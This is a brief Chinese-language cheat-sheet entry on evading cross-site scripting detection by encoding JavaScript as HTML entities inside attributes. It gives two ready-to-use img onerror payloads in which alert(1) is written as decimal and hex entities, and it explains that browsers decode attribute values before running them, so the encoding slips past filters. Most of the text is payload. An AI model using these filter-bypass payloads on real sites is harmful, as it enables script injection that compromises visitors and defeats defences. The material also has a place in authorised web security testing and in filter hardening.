XSS之HTML属性编码绕过检测

<img src onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<img src onerror="&#x61;&#x6c;&#101;&#114;&#116;&#40;&#49;&#41;">
在进行xss时,若弹窗语句在属性内部,HTML属性在执行时会做HTMLDecode编码,可以利用这个方法绕过检测.

alert(1) ==> &#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41; ASCII码
alert(1) ==> &#x61;&#x6c;&#101;&#114;&#116;&#40;&#49;&#41; HEX+ASCII